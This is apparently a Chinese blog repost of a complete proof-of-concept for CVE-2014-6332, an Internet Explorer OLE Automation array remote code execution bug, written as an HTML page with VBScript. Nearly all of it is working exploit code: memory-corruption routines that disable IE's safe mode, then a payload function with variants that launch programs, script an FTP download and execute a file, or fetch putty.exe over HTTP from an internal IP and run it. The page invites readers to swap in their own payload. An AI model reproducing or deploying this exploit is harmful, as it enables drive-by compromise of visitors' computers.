MS14-065各种版本的poc
2014-11-21 13:55
585 查看
Internet Explorer < 11 - OLE Automation Array Remote Code Execution
//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() //修改各种版本修改这个函数的内容就可以了 On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" //ftp版本 shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe" // //http下载版本 objWsh.run "cmd.exe /c echo >>d:\text.vbs Set xPost=createObject(""Microsoft.XMLHTTP"") & echo >>d:\text.vbs xPost.Open ""GET"",""http://172.16.22.100/putty.exe"",0 & echo >>d:\text.vbs xPost.Send() & echo >>d:\text.vbs set sGet=createObject(""ADODB.Stream"") & echo >>d:\text.vbs sGet.Mode=3 & echo >>d:\text.vbs sGet.Type=1 & echo >>d:\text.vbs sGet.Open() & echo >>d:\text.vbs sGet.Write xPost.ResponseBody & echo >>d:\text.vbs sGet.SaveToFile ""d:\putty.exe"",2",0 objWsh.run "cscript.exe d:\text.vbs",0,true wscript.sleep 10000 objWsh.run "d:\putty.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>
相关文章推荐
- 各种常见的排序 java版本(冒泡,选择,插入,希尔,快速)
- maven 添加ojdbc及ojdbc的各种版本说明
- Notification(Notification的通知栏常驻、各种样式、点击无效、禁止滑动删除、兼容低版本)
- 电脑Win7如何取得文件管理所有权(提供各种GHOST版本的Windows)
- VS2008--VS2013 各种版本官方下载地址
- 各种版本的称呼--例如Lite指精减版
- SQL Server 2005 的各种版本所支持的功能
- 模拟IE各种版本的方法
- 关于各种版本缩写
- Linux下卸载JDK (针对各种不同版本的JDK)
- BaseAnimation是基于开源的APP,致力于收集各种动画效果(最新版本1.3)
- [完美]原生JS获取浏览器版本判断--支持Edge,IE,Chrome,Firefox,Opera,Safari,以及各种使用Chrome和IE混合内核的浏览器
- 各种计算机语言的经典书籍 - 2007最新版本
- Struts 各种老版本下载地址列表
- SHA256加密-各种语言版本的基于HMAC-SHA256的base64加密
- 深度学习模型之各种caffe版本(Linux和windows)的网址和配置
- Linux各种版本下载
- dedecms各种数字统计SQL语句 包括评论条数,总文档数等等[附修修改版本]
- ARM的各种版本号
- linux下安装apache(httpd-2.4.3版本)各种坑